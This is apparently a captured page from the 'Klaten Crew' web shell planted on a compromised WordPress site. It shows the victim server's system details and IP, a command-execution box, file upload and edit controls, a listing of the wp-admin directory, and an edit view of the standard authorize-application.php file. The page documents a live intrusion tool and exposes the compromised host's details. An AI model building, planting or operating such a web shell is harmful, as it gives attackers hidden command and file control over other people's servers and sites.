HanJsXploit Klaten Crew
Linux r5.a1center.net 4.18.0-513.5.1.lve.el8.x86_64 #1 SMP Tue Nov 21 10:14:49 UTC 2023 x86_64
Apache
Server: 167.114.27.228
Your IP: 216.73.217.47
System Info
HOME
home
ipifapor
progob.ipifap.org
wp-admin
Command Execution
Execute
File Upload
Upload
New Folder
New File
Name
Type
Size
Permissions
Modified
Actions
..
Parent
-
drwxr-xr-x
2026-07-26 14:34:39
-
css
Folder
-
0755
2026-05-22 09:49:16
images
Folder
-
0755
2026-05-22 09:49:16
includes
Folder
-
0755
2026-02-25 22:58:20
js
Folder
-
0755
2024-10-07 16:51:07
maint
Folder
-
0755
2023-01-22 08:02:00
network
Folder
-
0755
2024-10-07 16:51:07
user
Folder
-
0755
2024-10-07 16:51:07
about.php
File
17.38 KB
0644
2026-07-17 19:13:41
admin-ajax.php
File
5.03 KB
0644
2024-07-04 16:22:14
admin-footer.php
File
2.75 KB
0644
2026-01-05 21:04:58
admin-functions.php
File
479 B
0644
2025-01-22 19:06:22
admin-header.php
File
9.07 KB
0644
2026-02-15 13:02:42
admin-post.php
File
1.97 KB
0644
2025-01-16 21:18:24
admin.php
File
12.63 KB
0644
2026-03-13 04:24:40
async-upload.php
File
5.47 KB
0644
2025-08-27 15:34:28
authorize-application.php
File
10.09 KB
0644
2023-09-14 05:54:20
comment.php
File
11.37 KB
0644
2026-03-07 04:20:46
contribute.php
File
5.9 KB
0644
2026-07-09 20:41:04
credits.php
File
4.42 KB
0644
2026-07-09 20:41:03
custom-background.php
File
489 B
0644
2025-01-22 19:06:22
custom-header.php
File
499 B
0644
2025-01-22 19:06:22
customize.php
File
11.21 KB
0644
2026-05-13 12:20:44
edit-comments.php
File
14.14 KB
0644
2026-02-13 22:52:44
edit-form-advanced.php
File
28.79 KB
0644
2026-01-05 21:04:58
edit-form-blocks.php
File
14.73 KB
0644
2026-02-20 16:52:24
edit-form-comment.php
File
8.33 KB
0644
2026-02-16 22:02:48
edit-link-form.php
File
6.21 KB
0644
2025-02-08 16:44:24
edit-tag-form.php
File
10.42 KB
0644
2026-01-05 21:04:58
edit-tags.php
File
21.98 KB
0644
2026-01-05 21:04:58
edit.php
File
19.48 KB
0644
2024-10-04 03:46:16
erase-personal-data.php
File
7.33 KB
0644
2024-04-18 01:21:16
error_log
File
1.68 KB
0644
2026-06-05 14:56:03
export-personal-data.php
File
7.75 KB
0644
2024-04-18 01:21:16
export.php
File
11 KB
0644
2026-01-05 21:04:58
font-library.php
File
1.01 KB
0644
2026-01-19 22:00:30
freedoms.php
File
4.84 KB
0644
2026-07-09 20:41:04
import.php
File
7.58 KB
0644
2025-02-25 23:34:16
index.php
File
7.68 KB
0644
2023-09-14 05:54:20
install-helper.php
File
6.8 KB
0644
2022-11-20 19:10:16
install.php
File
17.91 KB
0644
2026-02-19 02:14:48
link-add.php
File
934 B
0644
2025-02-08 16:44:24
link-manager.php
File
4.26 KB
0644
2025-02-08 16:44:24
link-parse-opml.php
File
2.63 KB
0644
2026-01-09 07:40:54
link.php
File
2.89 KB
0644
2024-05-01 23:01:12
load-scripts.php
File
2.02 KB
0644
2024-08-26 04:48:14
load-styles.php
File
2.92 KB
0644
2024-11-04 20:51:18
media-new.php
File
3.17 KB
0644
2026-02-01 15:18:40
media-upload.php
File
3.58 KB
0644
2025-02-08 20:53:18
media.php
File
819 B
0644
2024-05-01 23:01:12
menu-header.php
File
9.82 KB
0644
2025-02-21 02:29:22
menu.php
File
17.72 KB
0644
2026-04-27 05:04:40
moderation.php
File
307 B
0644
2020-02-06 11:33:12
ms-admin.php
File
196 B
0644
2020-02-06 11:33:12
ms-delete-site.php
File
4.5 KB
0644
2025-04-21 16:49:32
ms-edit.php
File
216 B
0644
2020-02-06 11:33:12
ms-options.php
File
229 B
0644
2024-06-22 16:47:16
ms-sites.php
File
215 B
0644
2020-02-06 11:33:12
ms-themes.php
File
217 B
0644
2020-02-06 11:33:12
ms-upgrade-network.php
File
219 B
0644
2020-02-06 11:33:12
ms-users.php
File
215 B
0644
2020-02-06 11:33:12
my-sites.php
File
4.72 KB
0644
2026-01-06 10:57:56
nav-menus.php
File
49.07 KB
0644
2026-02-17 11:47:40
network.php
File
5.39 KB
0644
2024-03-09 03:38:08
options-connectors.php
File
1.07 KB
0644
2026-03-05 17:09:16
options-discussion.php
File
15.92 KB
0644
2025-11-11 03:51:36
options-general.php
File
22.32 KB
0644
2026-02-28 04:43:42
options-head.php
File
621 B
0644
2025-01-22 19:06:22
options-media.php
File
6.38 KB
0644
2025-09-29 03:38:32
options-permalink.php
File
21.89 KB
0644
2026-03-05 00:48:42
options-privacy.php
File
9.92 KB
0644
2026-01-09 09:22:50
options-reading.php
File
9.97 KB
0644
2026-03-23 04:06:56
options-writing.php
File
9.1 KB
0644
2026-05-08 20:59:44
options.php
File
13.93 KB
0644
2026-05-08 20:59:44
plugin-editor.php
File
13.75 KB
0644
2025-10-14 02:50:28
plugin-install.php
File
6.96 KB
0644
2024-02-20 12:27:06
plugins.php
File
30 KB
0644
2025-10-14 04:12:28
post-new.php
File
2.7 KB
0644
2024-06-15 17:34:14
post.php
File
10.03 KB
0644
2025-09-06 11:49:32
press-this.php
File
2.41 KB
0644
2026-02-20 07:25:46
privacy-policy-guide.php
File
3.67 KB
0644
2023-11-22 22:44:24
privacy.php
File
2.83 KB
0644
2026-07-09 20:41:04
profile.php
File
283 B
0644
2020-02-06 11:33:12
revision.php
File
5.7 KB
0644
2025-10-07 19:30:30
setup-config.php
File
17.52 KB
0644
2026-02-19 02:14:48
site-editor.php
File
12.07 KB
0644
2026-02-20 16:52:24
site-health-info.php
File
4.05 KB
0644
2026-02-12 02:10:40
site-health.php
File
10.18 KB
0644
2026-01-06 10:57:56
term.php
File
2.2 KB
0644
2022-06-01 23:14:10
theme-editor.php
File
16.87 KB
0644
2025-10-16 05:16:32
theme-install.php
File
23.65 KB
0644
2026-07-09 20:41:04
themes.php
File
48.25 KB
0644
2026-07-09 20:41:04
tools.php
File
3.43 KB
0644
2023-02-23 15:38:22
update-core.php
File
45.12 KB
0644
2026-01-23 23:14:36
update.php
File
12.76 KB
0644
2026-01-09 07:48:52
upgrade-functions.php
File
341 B
0644
2020-02-06 11:33:12
upgrade.php
File
6.24 KB
0644
2026-02-19 02:14:48
upload.php
File
14.9 KB
0644
2026-01-09 07:26:54
user-edit.php
File
40.35 KB
0644
2026-04-27 11:12:44
user-new.php
File
24.06 KB
0644
2026-02-16 22:02:48
users.php
File
23.44 KB
0644
2026-03-14 13:15:46
widgets-form-blocks.php
File
5.12 KB
0644
2025-08-27 15:34:28
widgets-form.php
File
19.14 KB
0644
2026-02-19 03:03:44
widgets.php
File
1.09 KB
0644
2022-03-23 00:59:04
0
items selected
Choose Action...
Delete Selected
Zip Selected
Unzip Selected
Execute Action
Clear Selection
© Klaten Crew WebShell | Auto Bypass Enabled
Create New Folder
Create New File
Edit File: authorize-application.php
<?php /** * Authorize Application Screen * * @package WordPress * @subpackage Administration */ /** WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; $error = null; $new_password = ''; // This is the no-js fallback script. Generally this will all be handled by `auth-app.js`. if ( isset( $_POST['action'] ) && 'authorize_application_password' === $_POST['action'] ) { check_admin_referer( 'authorize_application_password' ); $success_url = $_POST['success_url']; $reject_url = $_POST['reject_url']; $app_name = $_POST['app_name']; $app_id = $_POST['app_id']; $redirect = ''; if ( isset( $_POST['reject'] ) ) { if ( $reject_url ) { $redirect = $reject_url; } else { $redirect = admin_url(); } } elseif ( isset( $_POST['approve'] ) ) { $created = WP_Application_Passwords::create_new_application_password( get_current_user_id(), array( 'name' => $app_name, 'app_id' => $app_id, ) ); if ( is_wp_error( $created ) ) { $error = $created; } else { list( $new_password ) = $created; if ( $success_url ) { $redirect = add_query_arg( array( 'site_url' => urlencode( site_url() ), 'user_login' => urlencode( wp_get_current_user()->user_login ), 'password' => urlencode( $new_password ), ), $success_url ); } } } if ( $redirect ) { // Explicitly not using wp_safe_redirect b/c sends to arbitrary domain. wp_redirect( $redirect ); exit; } } // Used in the HTML title tag. $title = __( 'Authorize Application' ); $app_name = ! empty( $_REQUEST['app_name'] ) ? $_REQUEST['app_name'] : ''; $app_id = ! empty( $_REQUEST['app_id'] ) ? $_REQUEST['app_id'] : ''; $success_url = ! empty( $_REQUEST['success_url'] ) ? $_REQUEST['success_url'] : null; if ( ! empty( $_REQUEST['reject_url'] ) ) { $reject_url = $_REQUEST['reject_url']; } elseif ( $success_url ) { $reject_url = add_query_arg( 'success', 'false', $success_url ); } else { $reject_url = null; } $user = wp_get_current_user(); $request = compact( 'app_name', 'app_id', 'success_url', 'reject_url' ); $is_valid = wp_is_authorize_application_password_request_valid( $request, $user ); if ( is_wp_error( $is_valid ) ) { wp_die( __( 'The Authorize Application request is not allowed.' ) . ' ' . implode( ' ', $is_valid->get_error_messages() ), __( 'Cannot Authorize Application' ) ); } if ( wp_is_site_protected_by_basic_auth( 'front' ) ) { wp_die( __( 'Your website appears to use Basic Authentication, which is not currently compatible with application passwords.' ), __( 'Cannot Authorize Application' ), array( 'response' => 501, 'link_text' => __( 'Go Back' ), 'link_url' => $reject_url ? add_query_arg( 'error', 'disabled', $reject_url ) : admin_url(), ) ); } if ( ! wp_is_application_passwords_available_for_user( $user ) ) { if ( wp_is_application_passwords_available() ) { $message = __( 'Application passwords are not available for your account. Please contact the site administrator for assistance.' ); } else { $message = __( 'Application passwords are not available.' ); } wp_die( $message, __( 'Cannot Authorize Application' ), array( 'response' => 501, 'link_text' => __( 'Go Back' ), 'link_url' => $reject_url ? add_query_arg( 'error', 'disabled', $reject_url ) : admin_url(), ) ); } wp_enqueue_script( 'auth-app' ); wp_localize_script( 'auth-app', 'authApp', array( 'site_url' => site_url(), 'user_login' => $user->user_login, 'success' => $success_url, 'reject' => $reject_url ? $reject_url : admin_url(), ) ); require_once ABSPATH . 'wp-admin/admin-header.php'; ?> <div class="wrap"> <h1><?php echo esc_html( $title ); ?></h1> <?php if ( is_wp_error( $error ) ) { wp_admin_notice( $error->get_error_message(), array( 'type' => 'error', ) ); } ?> <div class="card auth-app-card"> <h2 class="title"><?php _e( 'An application would like to connect to your account.' ); ?></h2> <?php if ( $app_name ) : ?> <p> <?php printf( /* translators: %s: Application name. */ __( 'Would you like to give the application identifying itself as %s access to your account? You should only do this if you trust the application in question.' ), '<strong>' . esc_html( $app_name ) . '</strong>' ); ?> </p> <?php else : ?> <p><?php _e( 'Would you like to give this application access to your account? You should only do this if you trust the application in question.' ); ?></p> <?php endif; ?> <?php if ( is_multisite() ) { $blogs = get_blogs_of_user( $user->ID, true ); $blogs_count = count( $blogs ); if ( $blogs_count > 1 ) { ?> <p> <?php /* translators: 1: URL to my-sites.php, 2: Number of sites the user has. */ $message = _n( 'This will grant access to <a href="%1$s">the %2$s site in this installation that you have permissions on</a>.', 'This will grant access to <a href="%1$s">all %2$s sites in this installation that you have permissions on</a>.', $blogs_count ); if ( is_super_admin() ) { /* translators: 1: URL to my-sites.php, 2: Number of sites the user has. */ $message = _n( 'This will grant access to <a href="%1$s">the %2$s site on the network as you have Super Admin rights</a>.', 'This will grant access to <a href="%1$s">all %2$s sites on the network as you have Super Admin rights</a>.', $blogs_count ); } printf( $message, admin_url( 'my-sites.php' ), number_format_i18n( $blogs_count ) ); ?> </p> <?php } } ?> <?php if ( $new_password ) : $message = '<p class="application-password-display"> <label for="new-application-password-value">' . sprintf( /* translators: %s: Application name. */ esc_html__( 'Your new password for %s is:' ), '<strong>' . esc_html( $app_name ) . '</strong>' ) . ' </label> <input id="new-application-password-value" type="text" class="code" readonly="readonly" value="' . esc_attr( WP_Application_Passwords::chunk_password( $new_password ) ) . '" /> </p> <p>' . __( 'Be sure to save this in a safe location. You will not be able to retrieve it.' ) . '</p>'; $args = array( 'type' => 'success', 'additional_classes' => array( 'notice-alt', 'below-h2' ), 'paragraph_wrap' => false, ); wp_admin_notice( $message, $args ); /** * Fires in the Authorize Application Password new password section in the no-JS version. * * In most cases, this should be used in combination with the {@see 'wp_application_passwords_approve_app_request_success'} * action to ensure that both the JS and no-JS variants are handled. * * @since 5.6.0 * @since 5.6.1 Corrected action name and signature. * * @param string $new_password The newly generated application password. * @param array $request The array of request data. All arguments are optional and may be empty. * @param WP_User $user The user authorizing the application. */ do_action( 'wp_authorize_application_password_form_approved_no_js', $new_password, $request, $user ); else : ?> <form action="<?php echo esc_url( admin_url( 'authorize-application.php' ) ); ?>" method="post" class="form-wrap"> <?php wp_nonce_field( 'authorize_application_password' ); ?> <input type="hidden" name="action" value="authorize_application_password" /> <input type="hidden" name="app_id" value="<?php echo esc_attr( $app_id ); ?>" /> <input type="hidden" name="success_url" value="<?php echo esc_url( $success_url ); ?>" /> <input type="hidden" name="reject_url" value="<?php echo esc_url( $reject_url ); ?>" /> <div class="form-field"> <label for="app_name"><?php _e( 'New Application Password Name' ); ?></label> <input type="text" id="app_name" name="app_name" value="<?php echo esc_attr( $app_name ); ?>" required /> </div> <?php /** * Fires in the Authorize Application Password form before the submit buttons. * * @since 5.6.0 * * @param array $request { * The array of request data. All arguments are optional and may be empty. * * @type string $app_name The suggested name of the application. * @type string $success_url The URL the user will be redirected to after approving the application. * @type string $reject_url The URL the user will be redirected to after rejecting the application. * } * @param WP_User $user The user authorizing the application. */ do_action( 'wp_authorize_application_password_form', $request, $user ); ?> <?php submit_button( __( 'Yes, I approve of this connection' ), 'primary', 'approve', false, array( 'aria-describedby' => 'description-approve', ) ); ?> <p class="description" id="description-approve"> <?php if ( $success_url ) { printf( /* translators: %s: The URL the user is being redirected to. */ __( 'You will be sent to %s' ), '<strong><code>' . esc_html( add_query_arg( array( 'site_url' => site_url(), 'user_login' => $user->user_login, 'password' => '[------]', ), $success_url ) ) . '</code></strong>' ); } else { _e( 'You will be given a password to manually enter into the application in question.' ); } ?> </p> <?php submit_button( __( 'No, I do not approve of this connection' ), 'secondary', 'reject', false, array( 'aria-describedby' => 'description-reject', ) ); ?> <p class="description" id="description-reject"> <?php if ( $reject_url ) { printf( /* translators: %s: The URL the user is being redirected to. */ __( 'You will be sent to %s' ), '<strong><code>' . esc_html( $reject_url ) . '</code></strong>' ); } else { _e( 'You will be returned to the WordPress Dashboard, and no changes will be made.' ); } ?> </p> </form> <?php endif; ?> </div> </div> <?php require_once ABSPATH . 'wp-admin/admin-footer.php';
Rename
Change Permissions
Common permissions: 755 (rwxr-xr-x), 644 (rw-r--r--), 777 (rwxrwxrwx)
System Information
Uname: Linux r5.a1center.net 4.18.0-513.5.1.lve.el8.x86_64 #1 SMP Tue Nov 21 10:14:49 UTC 2023 x86_64 Software: Apache PHP Version: 8.3.31 Protocol: HTTP/1.1 Server IP: 167.114.27.228 Your IP: 216.73.217.47 Mail: ON Curl: ON Owner: ipifapor MySQL: ON Disabled Functions: All functions are accessible Auto Bypass: ENABLED